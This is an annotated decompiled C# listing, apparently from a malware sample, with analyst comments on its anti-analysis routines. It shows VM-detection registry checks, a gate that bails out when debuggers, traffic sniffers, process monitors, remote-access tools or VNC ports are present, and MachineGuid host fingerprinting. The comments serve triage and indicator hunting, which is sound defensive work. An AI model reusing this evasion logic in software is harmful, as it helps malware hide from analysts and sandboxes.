        // Token: 0x060000A6 RID: 166 RVA: 0x0000458C File Offset: 0x0000278C
        /// <summary>
        /// Environment-fingerprinting check that looks for virtual-machine artifacts
        /// in the registry.
        /// </summary>
        /// <remarks>
        /// Analyst notes (behaviour as written in this listing):
        /// <list type="bullet">
        /// <item>If <c>RegSystem.IsOneExist</c> reports any of the four hypervisor-related
        /// keys, the method returns <c>false</c>. That reads as inverted relative to the
        /// method name; whether it is deliberate cannot be determined from this page.</item>
        /// <item>Otherwise the first disk enumeration entry and the BIOS
        /// <c>SystemManufacturer</c> string are lower-cased and searched for each marker
        /// substring; the first hit returns <c>true</c>.</item>
        /// <item>A <c>null</c> from <c>RegSystem.GetValue</c> is not handled and would
        /// surface as a <see cref="NullReferenceException"/>.</item>
        /// </list>
        /// Reads of these keys and values are a useful behavioural indicator of
        /// sandbox/VM awareness when triaging a sample.
        /// </remarks>
        /// <returns><c>true</c> when a marker substring is found in either registry string.</returns>
        public static bool IsRunningVM()
        {
            List<string> hypervisorKeys = new List<string>
            {
                "SOFTWARE\\Classes\\Virtual.Machine.VMC",
                "SOFTWARE\\Wow6432Node\\Classes\\Virtual.Machine.VMC",
                "Software\\Oracle\\VirtualBox",
                "Software\\VMware, Inc."
            };
            if (RegSystem.IsOneExist(hypervisorKeys))
            {
                return false;
            }

            List<string> vmMarkers = new List<string>
            {
                "vbox",
                "vmware",
                "parallels",
                "parallels vm",
                "xen",
                "virtual",
                "VM"
            };

            string diskEnum = RegSystem.GetValue("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Disk\\Enum", "0");
            string biosVendor = RegSystem.GetValue("HKEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\System\\BIOS", "SystemManufacturer");

            foreach (string marker in vmMarkers)
            {
                string needle = marker.ToLower();

                // The disk string is tested first; the BIOS string is only touched
                // when the disk string does not contain the marker.
                if (diskEnum.ToLower().Contains(needle))
                {
                    return true;
                }
                if (biosVendor.ToLower().Contains(needle))
                {
                    return true;
                }
            }
            return false;
        }
        // Token: 0x060000A4 RID: 164 RVA: 0x00004514 File Offset: 0x00002714
        /// <summary>
        /// Replaces the first <c>{IDMachine}</c> placeholder in <paramref name="str"/>
        /// with the value returned by <c>RegSystem.GetIDMachine()</c>.
        /// </summary>
        /// <remarks>
        /// Analyst note: the placeholder is assumed to be present. When it is missing,
        /// <c>IndexOf</c> yields -1 and <c>Remove</c> throws
        /// <see cref="ArgumentOutOfRangeException"/>. Strings carrying this placeholder
        /// are where the host identifier is embedded; where those strings are sent or
        /// stored is not visible in this listing.
        /// </remarks>
        /// <param name="str">Template text containing the placeholder.</param>
        /// <returns>The text with the placeholder substituted.</returns>
        public static string SubIDMachine(string str)
        {
            const string placeholder = "{IDMachine}";
            int at = str.IndexOf(placeholder);

            // Remove runs before the identifier is fetched, matching the original order.
            return str.Remove(at, placeholder.Length).Insert(at, RegSystem.GetIDMachine());
        }
        // Token: 0x060000A5 RID: 165 RVA: 0x00004548 File Offset: 0x00002748
        /// <summary>
        /// Checks whether <paramref name="id"/> equals the machine identifier after it
        /// has been stripped of dashes, trimmed and reversed character by character.
        /// </summary>
        /// <remarks>
        /// Analyst note: the comparison is an exact <c>string.Equals</c>, so case and
        /// length must match. The reversal is a simple transformation of the value
        /// from <c>RegSystem.GetIDMachine()</c>, not a cryptographic operation.
        /// </remarks>
        /// <param name="id">Candidate identifier to validate.</param>
        /// <returns><c>true</c> when the candidate matches the transformed identifier.</returns>
        public static bool IfMachineIDOk(string id)
        {
            char[] reversed = RegSystem.GetIDMachine().Replace("-", "").Trim().ToCharArray();
            Array.Reverse(reversed);
            return id.Equals(new string(reversed));
        }
 // Token: 0x06000099 RID: 153 RVA: 0x00004054 File Offset: 0x00002254
 /// <summary>
 /// Expands the <c>{GB_UMDEK}</c> placeholder using the upper-cased name of the
 /// first subkey found under <c>Software\Cisco</c>.
 /// </summary>
 /// <remarks>
 /// Analyst notes:
 /// <list type="bullet">
 /// <item>The presence test is done on an upper-cased copy, but the replacement is
 /// case-sensitive, so a placeholder written in another case passes the test and is
 /// left unexpanded.</item>
 /// <item><c>"HKCRU"</c> is a root alias interpreted by
 /// <c>RegSystem.GetRegistrySubDirs</c>, which is not part of this listing.</item>
 /// <item>An empty (non-null) subkey array would throw on index 0.</item>
 /// </list>
 /// </remarks>
 /// <param name="str">Filter text that may contain the placeholder.</param>
 /// <returns>
 /// The expanded text, the input unchanged when no placeholder is present, or
 /// <c>null</c> when the subkey lookup returns <c>null</c>.
 /// </returns>
 internal static string ReplaceWithSpecialConstants(string str)
 {
     if (!str.ToUpper().Contains("{GB_UMDEK}"))
     {
         return str;
     }

     string[] ciscoSubKeys = RegSystem.GetRegistrySubDirs("HKCRU", "Software\\Cisco");
     if (ciscoSubKeys == null)
     {
         return null;
     }
     return str.Replace("{GB_UMDEK}", ciscoSubKeys[0].ToUpper());
 }
 // Token: 0x0600009E RID: 158 RVA: 0x000043EC File Offset: 0x000025EC
 /// <summary>
 /// Reports whether at least one entry of <paramref name="regList"/> is found by
 /// <c>RegSystem.IsExist</c>.
 /// </summary>
 /// <remarks>
 /// Entries are probed in list order and the scan stops at the first hit, so later
 /// entries are never queried once one exists.
 /// </remarks>
 /// <param name="regList">Registry paths to probe.</param>
 /// <returns><c>true</c> on the first existing entry, otherwise <c>false</c>.</returns>
 public static bool IsOneExist(List<string> regList)
 {
     foreach (string registryPath in regList)
     {
         if (RegSystem.IsExist(registryPath))
         {
             return true;
         }
     }
     return false;
 }
 // Token: 0x0600009B RID: 155 RVA: 0x000042B4 File Offset: 0x000024B4
 /// <summary>
 /// Tests whether any subkey name under <paramref name="dir"/> matches
 /// <paramref name="subDirRegex"/>, ignoring case.
 /// </summary>
 /// <remarks>
 /// Analyst note: the pattern is passed to <c>Regex.IsMatch</c> as given, so a
 /// filter can match a family of subkey names (for example versioned product keys)
 /// rather than one fixed path.
 /// </remarks>
 /// <param name="root">Root alias understood by <c>RegSystem.GetRegistrySubDirs</c>.</param>
 /// <param name="dir">Registry path whose subkeys are enumerated.</param>
 /// <param name="subDirRegex">Regular expression applied to each subkey name.</param>
 /// <returns><c>true</c> on the first matching subkey; <c>false</c> when none match or the lookup returns <c>null</c>.</returns>
 internal static bool isExistSubDirWithRegex(string root, string dir, string subDirRegex)
 {
     string[] subKeyNames = RegSystem.GetRegistrySubDirs(root, dir);
     if (subKeyNames == null)
     {
         return false;
     }

     foreach (string subKeyName in subKeyNames)
     {
         if (Regex.IsMatch(subKeyName, subDirRegex, RegexOptions.IgnoreCase))
         {
             return true;
         }
     }
     return false;
 }
 // Token: 0x06000083 RID: 131 RVA: 0x00003D1C File Offset: 0x00001F1C
 /// <summary>
 /// Caches the Windows <c>ProductName</c> registry value in
 /// <c>WindowsVersion.regValue</c>.
 /// </summary>
 /// <remarks>
 /// The value is stored as returned by <c>RegSystem.GetValue</c>; a missing value
 /// is not handled here.
 /// </remarks>
 public static void init()
 {
     string productName = RegSystem.GetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName");
     WindowsVersion.regValue = productName;
 }
 // Token: 0x06000078 RID: 120 RVA: 0x000036C4 File Offset: 0x000018C4
 /// <summary>
 /// Environment gate: returns <c>true</c> only when none of the monitored
 /// registry filters, processes, tools, VM markers or listening ports is observed.
 /// </summary>
 /// <remarks>
 /// Analyst notes:
 /// <list type="bullet">
 /// <item>Checks run in a fixed order and stop at the first positive result:
 /// registry filters, named processes, Task Manager, Registry Editor, the VM check,
 /// then ports 5900-5904 (the range conventionally used by VNC).</item>
 /// <item>The process names cover VPN and remote-access software as well as
 /// traffic-inspection, process-monitoring, debugging and registry-snapshot tools,
 /// i.e. an analysis-awareness check.</item>
 /// <item>What the caller does with a <c>false</c> result is not visible in this
 /// listing.</item>
 /// </list>
 /// The literal process names and the port range are usable as static indicators
 /// when hunting for related samples.
 /// </remarks>
 /// <returns><c>true</c> when no monitored condition is detected.</returns>
 public static bool isOk()
 {
     if (RegSystem.IsOneExist(new List<string>(Filters.regFilters)))
     {
         return false;
     }

     // Same names, same order as the original short-circuit chain.
     string[] watchedProcesses =
     {
         "HMA! Pro VPN",
         "TeamViewer",
         "TeamViewer_Desktop",
         "TeamViewer_Service",
         "DFServ",
         "Fiddler",
         "Wireshark",
         "Capsa",
         "ipscan",
         "Procmon",
         "OLLYDBG",
         "Regshot-x64-Unicode.exe",
         "Regshot-Unicode.exe"
     };
     foreach (string processName in watchedProcesses)
     {
         if (System.IsProssRunning(processName))
         {
             return false;
         }
     }

     if (System.IsTaskMgrRunning() || System.IsRegEditRunning() || System.IsRunningVM())
     {
         return false;
     }

     if (System.IsPortInUse(5900) || System.IsPortInUse(5901) || System.IsPortInUse(5902) || System.IsPortInUse(5903) || System.IsPortInUse(5904))
     {
         return false;
     }
     return true;
 }
 // Token: 0x0600009A RID: 154 RVA: 0x000040A0 File Offset: 0x000022A0
 /// <summary>
 /// Evaluates one registry filter expression and reports whether it matches the
 /// local registry.
 /// </summary>
 /// <remarks>
 /// Filter grammar as implemented below (the first matching form wins):
 /// <list type="bullet">
 /// <item><c>path$regex</c> - any subkey of <c>path</c> whose name matches
 /// <c>regex</c>, tried under five root aliases.</item>
 /// <item><c>path&amp;valueName</c> - the named value exists under <c>path</c> in
 /// any of five hives.</item>
 /// <item><c>path&amp;valueName%=expected</c> - the first hive that has the value
 /// supplies it, and it must equal <c>expected</c> exactly.</item>
 /// <item>anything else - passed unchanged to <c>RegSystem.IsExist</c>.</item>
 /// </list>
 /// Analyst notes: '$' is tested before '&amp;', so an expression containing both
 /// is always handled as the '$' form. Only the first two parts of each split are
 /// used. The origin of the filter strings is not visible in this listing;
 /// presumably they come from <c>Filters.regFilters</c> - confirm against callers.
 /// </remarks>
 /// <param name="regExp">Filter expression, optionally containing the <c>{GB_UMDEK}</c> placeholder.</param>
 /// <returns><c>true</c> when the filter matches; <c>false</c> otherwise, including when placeholder expansion returns <c>null</c>.</returns>
 internal static bool isExistWithFormat(string regExp)
 {
     // Expand the placeholder first; a null result means the lookup behind it failed.
     regExp = RegSystem.ReplaceWithSpecialConstants(regExp);
     if (regExp == null)
     {
         return(false);
     }
     // Form 1: "path$regex" - regex match on subkey names.
     if (regExp.Contains("$"))
     {
         string[] array = regExp.Split(new char[]
         {
             '$'
         });
         string dir         = array[0];
         string subDirRegex = array[1];
         // Root names are aliases resolved inside RegSystem.GetRegistrySubDirs (not shown here).
         return(RegSystem.isExistSubDirWithRegex("HKCRU", dir, subDirRegex) || RegSystem.isExistSubDirWithRegex("HKLM", dir, subDirRegex) || RegSystem.isExistSubDirWithRegex("HKCLR", dir, subDirRegex) || RegSystem.isExistSubDirWithRegex("HKUSERS", dir, subDirRegex) || RegSystem.isExistSubDirWithRegex("HKCUCO", dir, subDirRegex));
     }
     // Forms 2 and 3: "path&valueName" with an optional "%=expected" suffix.
     if (regExp.Contains("&"))
     {
         string[] array2 = regExp.Split(new char[]
         {
             '&'
         });
         string str = array2[0];
         if (!array2[1].Contains("%"))
         {
             // Existence only: a non-null value in any hive is a match.
             string regKey = array2[1];
             return(RegSystem.GetValue("HKEY_CURRENT_USER\\" + str, regKey) != null || RegSystem.GetValue("HKEY_LOCAL_MACHINE\\" + str, regKey) != null || RegSystem.GetValue("HKEY_USERS\\" + str, regKey) != null || RegSystem.GetValue("HKEY_CURRENT_CONFIG\\" + str, regKey) != null || RegSystem.GetValue("HKEY_CLASSES_ROOT\\" + str, regKey) != null);
         }
         string[] array3 = array2[1].Split(new char[]
         {
             '%'
         });
         string regKey2 = array3[0];
         string text    = array3[1];
         // Only the "=" comparison operator is implemented; any other suffix
         // falls through to the final return(false).
         if (text.StartsWith("="))
         {
             // Replace removes every '=' in the expected text, not just the leading one.
             text = text.Replace("=", "");
             text = text.Trim();
             // Hives are tried in a fixed order; the first non-null value is the one compared.
             string value = RegSystem.GetValue("HKEY_CURRENT_USER\\" + str, regKey2);
             if (value == null)
             {
                 value = RegSystem.GetValue("HKEY_LOCAL_MACHINE\\" + str, regKey2);
                 if (value == null)
                 {
                     value = RegSystem.GetValue("HKEY_USERS\\" + str, regKey2);
                     if (value == null)
                     {
                         value = RegSystem.GetValue("HKEY_CURRENT_CONFIG\\" + str, regKey2);
                         if (value == null)
                         {
                             value = RegSystem.GetValue("HKEY_CLASSES_ROOT\\" + str, regKey2);
                             if (value == null)
                             {
                                 return(false);
                             }
                         }
                     }
                 }
             }
             // Exact, case-sensitive comparison against the expected text.
             return(text.Equals(value));
         }
     }
     // Form 4: plain path, checked as-is.
     else if (RegSystem.IsExist(regExp))
     {
         return(true);
     }
     return(false);
 }
 // Token: 0x060000A3 RID: 163 RVA: 0x00004501 File Offset: 0x00002701
 /// <summary>
 /// Returns the host's <c>MachineGuid</c> value from
 /// <c>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography</c>.
 /// </summary>
 /// <remarks>
 /// Analyst note: within this listing the value serves as the per-host identifier
 /// consumed by <c>SubIDMachine</c> and <c>IfMachineIDOk</c>. The result is passed
 /// through as returned by <c>RegSystem.GetValue</c>.
 /// </remarks>
 /// <returns>The registry value as returned by <c>RegSystem.GetValue</c>.</returns>
 public static string GetIDMachine()
 {
     string machineGuid = RegSystem.GetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", "MachineGuid");
     return machineGuid;
 }